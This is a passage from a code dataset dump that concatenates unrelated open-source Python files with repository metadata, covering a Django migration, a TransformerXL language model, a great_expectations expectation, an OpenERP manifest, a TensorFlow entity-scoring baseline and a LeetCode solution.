        print(match)
def main():
    """Fetch and print each regional chart in turn."""
    base_url = "http://vchart.yinyuetai.com/vchart/trends?area="
    for area in ['ML', 'HT', 'US', 'JP', 'KR']:
        chart_url = base_url + area
        print()
        get_content(chart_url)
if __name__ == '__main__':
    main()
"958255724@qq.com"
] | 958255724@qq.com |
c9ad0beaf717d4624106ae4450733c77f377bf54 | f97242dfbe3c629dcabb6226b59aaf808a5b1cec | /project/analysis/migrations/0002_auto_20151216_1041.py | ba6d0fa627953bddd0602f1598b1068dc1b19f8c | [] | no_license | shapiromatron/genomics | ab48cc2d7eab94e9777ffce0ee7d5865af7d7ae1 | 8cabcaf7a6a04cd84fdefca6a39c9fde5f3329c8 | refs/heads/master | 2021-01-21T04:50:24.186897 | 2016-06-10T19:52:24 | 2016-06-10T19:52:24 | 44,177,551 | 0 | 1 | null | 2016-06-10T19:44:42 | 2015-10-13T13:19:32 | Python | UTF-8 | Python | false | false | 2,020 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration for the `analysis` app.

    Fixes verbose plural names on several models and widens/relaxes the
    file-field definitions on matrix and genomic-dataset models.
    """
    # Must be applied after the app's initial schema migration.
    dependencies = [
        ('analysis', '0001_initial'),
    ]
    operations = [
        # Human-readable plural names for the admin UI.
        migrations.AlterModelOptions(
            name='analysis',
            options={'verbose_name_plural': 'Analyses'},
        ),
        migrations.AlterModelOptions(
            name='analysisdatasets',
            options={'verbose_name_plural': 'Analysis datasets'},
        ),
        migrations.AlterModelOptions(
            name='datasetcorrelationmatrix',
            options={'verbose_name_plural': 'Dataset correlation matrices'},
        ),
        migrations.AlterModelOptions(
            name='featurelistcountmatrix',
            options={'verbose_name_plural': 'Feature list count matrices'},
        ),
        # Matrix files: allow paths up to 256 characters.
        migrations.AlterField(
            model_name='datasetcorrelationmatrix',
            name='matrix',
            field=models.FileField(max_length=256, upload_to=''),
        ),
        migrations.AlterField(
            model_name='featurelistcountmatrix',
            name='matrix',
            field=models.FileField(max_length=256, upload_to=''),
        ),
        # Genomic data files: optional (blank=True), 256-char paths.
        migrations.AlterField(
            model_name='genomicdataset',
            name='data_ambiguous',
            field=models.FileField(max_length=256, blank=True, upload_to=''),
        ),
        migrations.AlterField(
            model_name='genomicdataset',
            name='data_minus',
            field=models.FileField(max_length=256, blank=True, upload_to=''),
        ),
        migrations.AlterField(
            model_name='genomicdataset',
            name='data_plus',
            field=models.FileField(max_length=256, blank=True, upload_to=''),
        ),
        # Genome assembly becomes a small-int enum: 1=hg19, 2=mm9.
        migrations.AlterField(
            model_name='genomicdataset',
            name='genome_assembly',
            field=models.PositiveSmallIntegerField(choices=[(1, 'hg19'), (2, 'mm9')]),
        ),
    ]
| [
"shapiromatron@gmail.com"
] | shapiromatron@gmail.com |
a9e04e7b4337a71ea3c4145ef99e36b28fc0f349 | c560b501fd326cad710c079e781a02366a70ddcf | /neural_sp/models/lm/transformer_xl.py | 8eb12980fa36974eec76a97e2addf844cccb643c | [
"Apache-2.0"
] | permissive | houwenxin/neural_sp | b3f90176c462f242304c202e3534dfb98c95b225 | b34e6c067bd79092abe8ff5445d9a55c147bef51 | refs/heads/master | 2023-03-11T16:04:12.668442 | 2021-03-03T15:32:36 | 2021-03-03T15:32:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,493 | py | # Copyright 2020 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""TransformerXL language model."""
import copy
import logging
import math
import os
import random
import shutil
import torch
import torch.nn as nn
from neural_sp.models.lm.lm_base import LMBase
from neural_sp.models.modules.initialization import init_like_transformer_xl
from neural_sp.models.modules.positional_embedding import XLPositionalEmbedding
from neural_sp.models.modules.transformer import TransformerDecoderBlock
from neural_sp.models.torch_utils import tensor2np
from neural_sp.utils import mkdir_join
import matplotlib
matplotlib.use('Agg')  # headless backend so attention plots render without a display
random.seed(1)  # NOTE(review): seeds the *global* random module at import time -- affects all importers; confirm intended
logger = logging.getLogger(__name__)
class TransformerXL(LMBase):
    """TransformerXL language model.

    Transformer decoder stack with segment-level recurrence: hidden states
    from previous segments are cached as `memory` and attended to with
    relative positional embeddings (`u_bias`/`v_bias`).
    """
    def __init__(self, args, save_path=None):
        """Build the model.

        Args:
            args: hyperparameter namespace (see `add_args` for the fields)
            save_path (str): directory used by `plot_attention` for figures
        """
        super(LMBase, self).__init__()
        logger.info(self.__class__.__name__)
        self.lm_type = args.lm_type
        self.save_path = save_path
        self.d_model = args.transformer_d_model
        self.n_layers = args.n_layers
        self.n_heads = args.transformer_n_heads
        self.lsm_prob = args.lsm_prob
        # Memory length defaults to the BPTT window when not set explicitly.
        if args.mem_len > 0:
            self.mem_len = args.mem_len
        else:
            self.mem_len = args.bptt
        # NOTE(review): a positive recog_mem_len unconditionally overrides the
        # training-time memory length -- presumably intended for ASR decoding
        # configs only; confirm it is not set during training.
        if args.recog_mem_len > 0:
            self.mem_len = args.recog_mem_len
        self.vocab = args.vocab
        self.eos = 2
        self.pad = 3
        # NOTE: reserved in advance
        # for cache
        self.cache_theta = 0.2 # smoothing parameter
        self.cache_lambda = 0.2 # cache weight
        self.cache_ids = []
        self.cache_keys = []
        self.cache_attn = []
        self.embed_cache = None
        # positional embedding (relative, TransformerXL style)
        self.pos_emb = XLPositionalEmbedding(self.d_model, args.dropout_in)
        self.u_bias = nn.Parameter(torch.Tensor(self.n_heads, self.d_model // self.n_heads))
        self.v_bias = nn.Parameter(torch.Tensor(self.n_heads, self.d_model // self.n_heads))
        # NOTE: u_bias and v_bias are global parameters
        self.embed = nn.Embedding(self.vocab, self.d_model, padding_idx=self.pad)
        self.scale = math.sqrt(self.d_model) # for token embedding
        self.dropout_emb = nn.Dropout(p=args.dropout_in) # for token embedding
        # Decoder-only blocks: no source-target attention, memory enabled.
        self.layers = nn.ModuleList([copy.deepcopy(TransformerDecoderBlock(
            self.d_model, args.transformer_d_ff, 'scaled_dot',
            self.n_heads, args.dropout_hidden, args.dropout_att, args.dropout_layer,
            args.transformer_layer_norm_eps, args.transformer_ffn_activation, args.transformer_param_init,
            src_tgt_attention=False, memory_transformer=True)) for lth in range(self.n_layers)])
        self.norm_out = nn.LayerNorm(self.d_model, eps=args.transformer_layer_norm_eps)
        self.adaptive_softmax = None
        self.output = None
        if args.adaptive_softmax:
            self.adaptive_softmax = nn.AdaptiveLogSoftmaxWithLoss(
                self.d_model, self.vocab,
                cutoffs=[round(self.vocab / 15), 3 * round(self.vocab / 15)],
                # cutoffs=[self.vocab // 25, 3 * self.vocab // 5],
                div_value=4.0)
        else:
            self.output = nn.Linear(self.d_model, self.vocab)
            # Weight tying between input embedding and output projection.
            if args.tie_embedding:
                self.output.weight = self.embed.weight
        self.reset_parameters()
    @property
    def output_dim(self):
        # Hidden size exposed to downstream consumers (e.g. LM fusion).
        return self.d_model
    @staticmethod
    def add_args(parser, args):
        """Add arguments."""
        group = parser.add_argument_group("Transformer-XL LM")
        group.add_argument('--transformer_d_model', type=int, default=256,
                           help='number of units in the MHA layer')
        group.add_argument('--transformer_d_ff', type=int, default=2048,
                           help='number of units in the FFN layer')
        # group.add_argument('--transformer_ffn_bottleneck_dim', type=int, default=0,
        #                    help='bottleneck dimension in the FFN layer')
        group.add_argument('--transformer_n_heads', type=int, default=4,
                           help='number of heads in the MHA layer')
        group.add_argument('--transformer_layer_norm_eps', type=float, default=1e-12,
                           help='epsilon value for layer normalization')
        group.add_argument('--transformer_ffn_activation', type=str, default='relu',
                           choices=['relu', 'gelu', 'gelu_accurate', 'glu', 'swish'],
                           help='nonlinear activation for the FFN layer')
        group.add_argument('--transformer_param_init', type=str, default='xavier_uniform',
                           choices=['xavier_uniform', 'pytorch'],
                           help='parameter initialization')
        group.add_argument('--dropout_att', type=float, default=0.1,
                           help='dropout probability for the attention weights')
        group.add_argument('--dropout_layer', type=float, default=0.0,
                           help='LayerDrop probability for Transformer layers')
        # XL specific
        group.add_argument('--mem_len', type=int, default=0,
                           help='number of tokens for memory in TransformerXL during training')
        return parser
    @staticmethod
    def define_name(dir_name, args):
        # Build a directory name that encodes the main hyperparameters.
        dir_name = args.lm_type
        dir_name += str(args.transformer_d_model) + 'dmodel'
        dir_name += str(args.transformer_d_ff) + 'dff'
        dir_name += str(args.n_layers) + 'L'
        dir_name += str(args.transformer_n_heads) + 'H'
        if args.tie_embedding:
            dir_name += '_tie'
        if args.adaptive_softmax:
            dir_name += '_adaptiveSM'
        if args.mem_len > 0:
            dir_name += '_mem' + str(args.mem_len)
        return dir_name
    def reset_parameters(self):
        """Initialize parameters with normal distribution."""
        logger.info('===== Initialize %s with normal distribution =====' % self.__class__.__name__)
        for n, p in self.named_parameters():
            init_like_transformer_xl(n, p, std=0.02)
    def init_memory(self):
        """Initialize memory."""
        # One empty tensor per layer; filled lazily by `update_memory`.
        return [torch.empty(0, dtype=torch.float).to(self.device)
                for _ in range(self.n_layers)]
    def update_memory(self, memory_prev, hidden_states):
        """Update memory.

        Args:
            memory_prev (List): length `n_layers` (inter-utterance),
                each of which contains a FloatTensor of size `[B, mlen, d_model]`
            hidden_states (List): length `n_layers` (intra-utterance),
                each of which contains a FloatTensor of size `[B, L, d_model]`
        Returns:
            new_mems (List): length `n_layers`,
                each of which contains a FloatTensor of size `[B, mlen, d_model]`

        """
        if memory_prev is None:
            memory_prev = self.init_memory()  # 0-th to L-1-th layer
        assert len(hidden_states) == len(memory_prev), (len(hidden_states), len(memory_prev))
        mlen = memory_prev[0].size(1) if memory_prev[0].dim() > 1 else 0
        qlen = hidden_states[0].size(1)
        # There are `mlen + qlen` steps that can be cached into mems
        # For the next step, the last `ext_len` of the `qlen` tokens
        # will be used as the extended context. Hence, we only cache
        # the tokens from `mlen + qlen - self.ext_len - self.mem_len`
        # to `mlen + qlen - self.ext_len`.
        with torch.no_grad():
            new_mems = []
            end_idx = mlen + qlen
            start_idx = max(0, end_idx - self.mem_len)
            for m, h in zip(memory_prev, hidden_states):
                cat = torch.cat([m, h], dim=1)  # `[B, mlen + qlen, d_model]`
                # Detach: memory carries no gradient across segments.
                new_mems.append(cat[:, start_idx:end_idx].detach())  # `[B, self.mem_len, d_model]`
        return new_mems
    def embed_token_id(self, indices):
        """Embed token IDs.

        Args:
            indices (LongTensor): `[B]`
        Returns:
            ys_emb (FloatTensor): `[B, vocab, emb_dim]`

        """
        # `embed_cache` is a precomputed table used only at inference time.
        if self.embed_cache is None or self.training:
            ys_emb = self.dropout_emb(self.embed(indices) * self.scale)
        else:
            ys_emb = self.embed_cache[indices]
        return ys_emb
    def decode(self, ys, state=None, mems=None, cache=None, incremental=False):
        """Decode function.

        Args:
            ys (LongTensor): `[B, L]`
            state (List): dummy interfance for RNNLM
            mems (List): length `n_layers` (inter-utterance),
                each of which contains a FloatTensor of size `[B, mlen, d_model]`
            cache (List): length `n_layers` (intra-utterance),
                each of which contains a FloatTensor of size `[B, L-1, d_model]`
            incremental (bool): ASR decoding mode
        Returns:
            logits (FloatTensor): `[B, L, vocab]`
            out (FloatTensor): `[B, L, d_model]`
            new_cache (List): length `n_layers`,
                each of which contains a FloatTensor of size `[B, L, d_model]`

        """
        # for ASR decoding
        if cache is None:
            cache = [None] * self.n_layers  # 1-th to L-th layer
        if mems is None:
            mems = self.init_memory()
            mlen = 0
        else:
            mlen = mems[0].size(1)
        bs, ylen = ys.size()[:2]
        if incremental and cache[0] is not None:
            # In incremental mode only the newest token is fed; the effective
            # query length is the cached prefix plus one.
            ylen = cache[0].size(1) + 1
        # Create the self-attention mask: lower-triangular over the query,
        # with the memory prefix (`mlen` columns) always visible.
        causal_mask = ys.new_ones(ylen, ylen + mlen).byte()
        causal_mask = torch.tril(causal_mask, diagonal=mlen).unsqueeze(0)
        causal_mask = causal_mask.repeat([bs, 1, 1])  # `[B, L, L+mlen]`
        out = self.embed_token_id(ys)
        rel_pos_embs = self.pos_emb(ys, mlen=mlen)
        new_mems = [None] * self.n_layers
        new_cache = [None] * self.n_layers
        hidden_states = [out]
        for lth, (mem, layer) in enumerate(zip(mems, self.layers)):
            # Broadcast a single-batch memory across beam hypotheses.
            if incremental and mlen > 0 and mem.size(0) != bs:
                mem = mem.repeat([bs, 1, 1])
            out = layer(out, causal_mask, cache=cache[lth],
                        pos_embs=rel_pos_embs, memory=mem, u_bias=self.u_bias, v_bias=self.v_bias)
            if incremental:
                new_cache[lth] = out
            elif lth < self.n_layers - 1:
                hidden_states.append(out)
                # NOTE: outputs from the last layer is not used for memory
            if not self.training and layer.yy_aws is not None:
                setattr(self, 'yy_aws_layer%d' % lth, tensor2np(layer.yy_aws))
        out = self.norm_out(out)
        if self.adaptive_softmax is None:
            logits = self.output(out)
        else:
            # Adaptive softmax consumes raw hidden states downstream.
            logits = out
        if incremental:
            # NOTE: do not update memory here during ASR decoding
            return logits, out, new_cache
        else:
            # Update memory
            new_mems = self.update_memory(mems, hidden_states)
            return logits, out, new_mems
    def plot_attention(self, n_cols=4):
        """Plot attention for each head in all layers."""
        from matplotlib import pyplot as plt
        from matplotlib.ticker import MaxNLocator
        save_path = mkdir_join(self.save_path, 'att_weights')
        # Clean directory
        if save_path is not None and os.path.isdir(save_path):
            shutil.rmtree(save_path)
            os.mkdir(save_path)
        for lth in range(self.n_layers):
            # Attention maps are captured in `decode` only at eval time.
            if not hasattr(self, 'yy_aws_layer%d' % lth):
                continue
            yy_aws = getattr(self, 'yy_aws_layer%d' % lth)
            plt.clf()
            fig, axes = plt.subplots(self.n_heads // n_cols, n_cols, figsize=(20, 8))
            for h in range(self.n_heads):
                if self.n_heads > n_cols:
                    ax = axes[h // n_cols, h % n_cols]
                else:
                    ax = axes[h]
                ax.imshow(yy_aws[-1, h, :, :], aspect="auto")
                ax.grid(False)
                ax.set_xlabel("Input (head%d)" % h)
                ax.set_ylabel("Output (head%d)" % h)
                ax.xaxis.set_major_locator(MaxNLocator(integer=True))
                ax.yaxis.set_major_locator(MaxNLocator(integer=True))
            fig.tight_layout()
            fig.savefig(os.path.join(save_path, 'layer%d.png' % (lth)))
            plt.close()
| [
"hiro.mhbc@gmail.com"
] | hiro.mhbc@gmail.com |
21b9439764ab2bc2b66440c6d24e63f1b755f5c2 | 4d586ecc9febedb199376bc005eb783c55fae7b0 | /great_expectations/expectations/core/expect_column_values_to_match_like_pattern.py | c6a927e14227c06c8ace633c79c429646d7294f7 | [
"Apache-2.0"
] | permissive | spbail/great_expectations | 1db532763ad9c5c07aec251b64a61de3fb6f677f | c4fa245f77912dfdfd613c84fb75f631c0b73f03 | refs/heads/main | 2023-07-01T23:40:44.586052 | 2021-04-22T00:09:35 | 2021-04-22T00:09:35 | 360,619,476 | 2 | 0 | Apache-2.0 | 2021-04-22T17:20:19 | 2021-04-22T17:20:18 | null | UTF-8 | Python | false | false | 2,792 | py | from typing import Optional
from great_expectations.core.expectation_configuration import ExpectationConfiguration
from great_expectations.expectations.util import render_evaluation_parameter_string
from ...render.renderer.renderer import renderer
from ...render.util import substitute_none_for_missing
from ..expectation import ColumnMapExpectation, InvalidExpectationConfigurationError
try:
import sqlalchemy as sa
except ImportError:
pass
class ExpectColumnValuesToMatchLikePattern(ColumnMapExpectation):
library_metadata = {
"maturity": "production",
"package": "great_expectations",
"tags": ["core expectation", "column map expectation"],
"contributors": [
"@great_expectations",
],
"requirements": [],
}
map_metric = "column_values.match_like_pattern"
success_keys = (
"mostly",
"like_pattern",
)
default_kwarg_values = {
"like_pattern": None,
"row_condition": None,
"condition_parser": None, # we expect this to be explicitly set whenever a row_condition is passed
"mostly": 1,
"result_format": "BASIC",
"include_config": True,
"catch_exceptions": True,
}
def validate_configuration(self, configuration: Optional[ExpectationConfiguration]):
super().validate_configuration(configuration)
try:
assert "like_pattern" in configuration.kwargs, "Must provide like_pattern"
assert isinstance(
configuration.kwargs.get("like_pattern"), (str, dict)
), "like_pattern must be a string"
if isinstance(configuration.kwargs.get("like_pattern"), dict):
assert "$PARAMETER" in configuration.kwargs.get(
"like_pattern"
), 'Evaluation Parameter dict for like_pattern kwarg must have "$PARAMETER" key.'
except AssertionError as e:
raise InvalidExpectationConfigurationError(str(e))
return True
@classmethod
@renderer(renderer_type="renderer.prescriptive")
@render_evaluation_parameter_string
def _prescriptive_renderer(
cls,
configuration=None,
result=None,
language=None,
runtime_configuration=None,
**kwargs
):
runtime_configuration = runtime_configuration or {}
include_column_name = runtime_configuration.get("include_column_name", True)
include_column_name = (
include_column_name if include_column_name is not None else True
)
styling = runtime_configuration.get("styling")
params = substitute_none_for_missing(
configuration.kwargs,
["column", "mostly", "row_condition", "condition_parser"],
)
| [
"noreply@github.com"
] | spbail.noreply@github.com |
5b2498d10e6e0f7de3e78241053183a155df9a95 | ce73929de648d080420fc99a86e7b73bfb15f0dc | /tms_maintenance/__openerp__.py | 67959bfef32db6801dfb3d8b4b7b99f04d6e8f0e | [] | no_license | thinkasoft/TMS | dce16ee4b10f9e35d392c883b443f556946d9526 | d8d07227749e07e047a03713142c0bb898a9abf6 | refs/heads/master | 2021-01-10T02:31:22.526633 | 2016-02-01T22:25:00 | 2016-02-01T22:25:00 | 50,875,749 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,922 | py | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012 HESATEC (<http://www.hesatecnica.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
{
"name" : "Fleet Maintenance Workshop Management",
"version" : "1.0",
"category" : "Vertical",
'complexity': "normal",
"author" : "HESATEC",
"website": "http://www.hesatecnica.com",
"depends" : ["tms","stock_move_entries"],
"description": """
Fleet Maintenance Workshop Management
=========================================
This application allows you to manage an Fleet Maintenance Workshop, very useful when Compnay has its own Maintenance Workshop.
It handles full Maintenance Workflow:
Opening Maintenance Order => Warehouse Integration => Closing Maintenance Order
Also, you can manage:
- Several Workshops
- Preventive Maintenance Cycles
- Corrective Maintenance
- Warehouse Integration for spare parts
Takes from Freight Management Module:
- Vehicles
- Trucks Red Tapes
- Truck Odometers
""",
"data" : [
'security/tms_security.xml',
'security/ir.model.access.csv',
'product_view.xml',
'tms_maintenance_view.xml',
'tms_maintenance_order_view.xml',
'tms_maintenance_order_activity_view.xml',
'tms_product_line_view.xml',
'sale_view.xml',
'tms_activity_control_time_view.xml',
'tms_time_view.xml',
'tms_analisys_01_view.xml',
'tms_analisys_02_view.xml',
'tms_analisys_03_view.xml',
'tms_analisys_04_view.xml',
#'tms_analisys_05_view.xml',
#'activities_to_invoice_view.xml',
#'create_invoice_view.xml',
'stock_view.xml',
'tms_maintenance_driver_report_view.xml',
'ir_config_parameter.xml'
],
"active": False,
'application': True,
"installable": True
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"you@example.com"
] | you@example.com |
2777fc95d9b7160b0a91a6bd8f318fee534d933e | 8bccc05fcb3cfc6ed93991927a514a96f53f7ec0 | /old_version/candidate_selection/tensorflow_models/baselines/entity_embedding_vs_gold.py | bf4932a2a4dc0e677e69a935306211c2a78dac5a | [
"MIT"
] | permissive | afcarl/QuestionAnsweringGCN | 54101c38549405d65ef22e38fed9e5bd58122ada | e9c1987b40a553f0619fa796f692c8880de32846 | refs/heads/master | 2020-03-20T10:35:55.729170 | 2018-06-07T11:45:12 | 2018-06-07T11:45:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,137 | py | import tensorflow as tf
from candidate_selection.tensorflow_hypergraph_representation import TensorflowHypergraphRepresentation
from candidate_selection.tensorflow_models.abstract_tensorflow_model import AbstractTensorflowModel
from candidate_selection.tensorflow_models.components.decoders.softmax_decoder import SoftmaxDecoder
from candidate_selection.tensorflow_models.components.embeddings.sequence_embedding import SequenceEmbedding
from candidate_selection.tensorflow_models.components.embeddings.static_vector_embedding import StaticVectorEmbedding
from candidate_selection.tensorflow_models.components.embeddings.vector_embedding import VectorEmbedding
from candidate_selection.tensorflow_models.components.extras.embedding_retriever import EmbeddingRetriever
from candidate_selection.tensorflow_models.components.extras.mean_gold_embedding_retriever import \
MeanGoldEmbeddingRetriever
from candidate_selection.tensorflow_models.components.extras.target_comparator import TargetComparator
from candidate_selection.tensorflow_models.components.vector_encoders.multilayer_perceptron import MultilayerPerceptron
from candidate_selection.tensorflow_sentence_representation import TensorflowSentenceRepresentation
class EntityEmbeddingVsGold(AbstractTensorflowModel):
    """Baseline model scoring candidate entities against the mean embedding
    of the gold entities, via a concat-comparator and an MLP."""

    def get_preprocessor_stack_types(self):
        # Preprocessors required before this model can consume a batch.
        preprocessor_stack_types = ["hypergraph", "gold", "sentence"]
        if self.model_settings["static_entity_embeddings"]:
            preprocessor_stack_types += ["static_entity_embeddings"]
        return preprocessor_stack_types

    def initialize_graph(self):
        """Instantiate and register all graph components (order matters for
        variable registration via `add_component`)."""
        # Trainable vs. frozen (static) entity embedding table.
        if not self.model_settings["static_entity_embeddings"]:
            self.entity_embedding = VectorEmbedding(self.entity_indexer, self.variables, variable_prefix="entity")
            self.add_component(self.entity_embedding)
        else:
            self.entity_embedding = StaticVectorEmbedding(self.entity_indexer, self.variables, variable_prefix="entity")
            self.add_component(self.entity_embedding)
        self.hypergraph = TensorflowHypergraphRepresentation(self.variables)
        self.add_component(self.hypergraph)
        # Looks up the mean embedding of the gold entity set.
        self.mean_gold_embedding_retriever = MeanGoldEmbeddingRetriever(self.variables, variable_prefix="gold_lookup")
        self.add_component(self.mean_gold_embedding_retriever)
        # NOTE(review): sentence/word components are disabled in this baseline.
        #self.question_sentence = TensorflowSentenceRepresentation(self.variables)
        #self.add_component(self.question_sentence)
        #self.word_embedding = SequenceEmbedding(self.word_indexer, self.variables, variable_prefix="word")
        #self.add_component(self.word_embedding)
        self.target_comparator = TargetComparator(self.variables, variable_prefix="comparison_to_sentence", comparison="concat")
        self.add_component(self.target_comparator)
        self.decoder = SoftmaxDecoder(self.variables)
        self.add_component(self.decoder)
        self.sentence_to_graph_mapper = EmbeddingRetriever(self.variables, duplicate_policy="sum", variable_prefix="mapper")
        self.add_component(self.sentence_to_graph_mapper)
        self.transformation = MultilayerPerceptron([self.model_settings["entity_embedding_dimension"],
                                                    self.model_settings["entity_embedding_dimension"]],
                                                   self.variables,
                                                   variable_prefix="transformation",
                                                   l2_scale=self.model_settings["regularization_scale"])
        self.add_component(self.transformation)
        self.vertex_transformation = MultilayerPerceptron([self.model_settings["entity_embedding_dimension"],
                                                    self.model_settings["entity_embedding_dimension"]],
                                                   self.variables,
                                                   variable_prefix="transformation",
                                                   l2_scale=self.model_settings["regularization_scale"])
        self.add_component(self.vertex_transformation)
        # Maps the concatenated (gold, vertex) comparison down to one score.
        self.final_transformation = MultilayerPerceptron([2*self.model_settings["entity_embedding_dimension"],
                                                          4 * self.model_settings["entity_embedding_dimension"],
                                                          1],
                                                   self.variables,
                                                   variable_prefix="transformation",
                                                   l2_scale=self.model_settings["regularization_scale"])
        self.add_component(self.final_transformation)

    def set_indexers(self, indexers):
        # Only the entity indexer is needed; word indexer is unused here.
        self.entity_indexer = indexers.entity_indexer

    def compute_entity_scores(self):
        """Return a per-vertex score tensor comparing each candidate vertex
        embedding with the mean gold-entity embedding."""
        self.hypergraph.entity_vertex_embeddings = self.entity_embedding.get_representations()
        # NOTE(review): leftover tf.Print debug statements below -- they print
        # on every run; consider removing before production use.
        self.hypergraph.entity_vertex_embeddings = tf.Print(self.hypergraph.entity_vertex_embeddings, [self.hypergraph.entity_vertex_embeddings], message="embeddings", summarize=100)
        gold_embeddings = self.mean_gold_embedding_retriever.get_representations(self.hypergraph.entity_vertex_embeddings)
        #gold_embeddings = tf.Print(gold_embeddings, [gold_embeddings], message="Gold: ", summarize=5)
        #gold_embeddings = self.transformation.transform(gold_embeddings)
        vertex_embeddings = self.hypergraph.entity_vertex_embeddings #self.vertex_transformation.transform(self.hypergraph.entity_vertex_embeddings)
        #gold_embeddings = tf.Print(gold_embeddings, [self.hypergraph.entity_vertex_embeddings], message="Vertices: ", summarize=100)
        hidden = self.target_comparator.get_comparison_scores(gold_embeddings, vertex_embeddings)
        entity_scores = tf.squeeze(self.final_transformation.transform(hidden))
        entity_scores = tf.Print(entity_scores, [entity_scores], summarize=25, message="entity_scores: ")
        #entity_scores = tf.Print(entity_scores, [entity_scores], message="Scores: ", summarize=25)
        return entity_scores
"michael.sejr@gmail.com"
] | michael.sejr@gmail.com |
733d22a07c4e1178875dce93e145e10c84489699 | c68d238ac786a42c4dd47d4ab5820709aa4dcdb3 | /ExFin/credit/migrations/0003_creditrateup.py | 2057cb69f91adc42bdaa82ecbdcd2ee1441e312d | [] | no_license | tenebranum/ExFin | b78d2a9651d5b9e8fb0fae3adccc48f7897221d2 | 7ac7b7a0be00537a6a600721009f4a28eb90c3ab | refs/heads/master | 2022-12-14T21:17:02.334600 | 2022-09-21T10:33:27 | 2022-09-21T10:33:27 | 139,338,729 | 0 | 0 | null | 2022-12-08T00:59:15 | 2018-07-01T15:07:52 | Python | UTF-8 | Python | false | false | 1,110 | py | # Generated by Django 2.0.2 on 2018-03-06 14:58
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated Django migration: adds the `CreditRateUp` model, which
    marks a credit rate as featured ("popular") on the main page."""
    dependencies = [
        ('credit', '0002_auto_20180303_1408'),
    ]
    operations = [
        migrations.CreateModel(
            name='CreditRateUp',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Icon shown next to the rate; choices are fixed CSS classes.
                ('icon_class', models.CharField(choices=[('cash', 'Наличка'), ('stick-man', 'Пенсионер'), ('sticker', 'Стикер')], max_length=128, verbose_name='Иконка')),
                # Link to the promoted credit rate; removed with it (CASCADE).
                ('credit_rate', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='credit.CreditRate', verbose_name='Кредитный тариф')),
            ],
            options={
                'verbose_name_plural': 'Популярные кредитные тарифы, вверху на главной',
                'verbose_name': 'Популярный кредитный тариф',
            },
        ),
    ]
| [
"vetal969696@gmail.com"
] | vetal969696@gmail.com |
5066a140ff8819c7e2b0f4236f3dadc455c60f9e | 72328633f1b4640868c2ba7af81adcca6350e7da | /07-动态规划/2-动态规划问题/03-064.py | a9ae8d6e8865cff23c72daa24b567b07e52219f0 | [] | no_license | qiaozhi827/leetcode-1 | a9f10192c74a6de498bce0fa7e1d995bf67edec4 | 1d1ffe25d8b49832acc1791261c959ce436a6362 | refs/heads/master | 2022-11-06T19:39:32.792946 | 2020-07-05T06:23:27 | 2020-07-05T06:23:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 872 | py | class Solution(object):
def minPathSum(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
m = len(grid)
if m == 0:
return 0
n = len(grid[0])
for j in range(1,n):
grid[0][j] += grid[0][j-1]
for i in range(1,m):
grid[i][0] += grid[i-1][0]
for i in range(1,m):
for j in range(1, n):
grid[i][j] = grid[i][j] + min(grid[i-1][j], grid[i][j-1])
return grid[-1][-1]
if __name__ == '__main__':
    # Simple stdin driver: first line is the row count m, followed by m lines
    # of space-separated integers; prints the minimal path sum per grid.
    obj = Solution()
    while True:
        # NOTE(review): loops forever; EOF or non-numeric input terminates the
        # script via an uncaught exception -- confirm this is intended.
        m = int(input())
        grid = []
        for i in range(m):
            nums_str = input().strip().split()
            nums = list(map(int, nums_str))
            grid.append(nums)
        res = obj.minPathSum(grid)
        print(res)
| [
"czy36mengfei@163.com"
] | czy36mengfei@163.com |
0da170eeb4c9c974c1cd842b20ba915ea9ff5e14 | b26c41926fa3a7c2c061132d80e91a2750f2f468 | /tensorflow_probability/python/experimental/util/jit_public_methods.py | 927285368770ee307c5f7c058aa83b3846574dff | [
"Apache-2.0"
] | permissive | tensorflow/probability | 22e679a4a883e408f8ef237cda56e3e3dfa42b17 | 42a64ba0d9e0973b1707fcd9b8bd8d14b2d4e3e5 | refs/heads/main | 2023-09-04T02:06:08.174935 | 2023-08-31T20:30:00 | 2023-08-31T20:31:33 | 108,053,674 | 4,055 | 1,269 | Apache-2.0 | 2023-09-13T21:49:49 | 2017-10-23T23:50:54 | Jupyter Notebook | UTF-8 | Python | false | false | 5,174 | py | # Copyright 2021 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""A wrapper to XLA-compile an object's public methods."""
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.distributions import distribution as distribution_lib
from tensorflow_probability.python.distributions import kullback_leibler
__all__ = [
    'DEFAULT_METHODS_EXCLUDED_FROM_JIT',
    'JitPublicMethods'
]

# Backend flags; presumably rewritten to True by TFP's backend-substitution
# tooling for the JAX/NumPy builds -- the NumPy branch below selects a no-op
# implementation when NUMPY_MODE is True. TODO confirm.
JAX_MODE = False
NUMPY_MODE = False

# Methods/properties left unwrapped by default: these return static
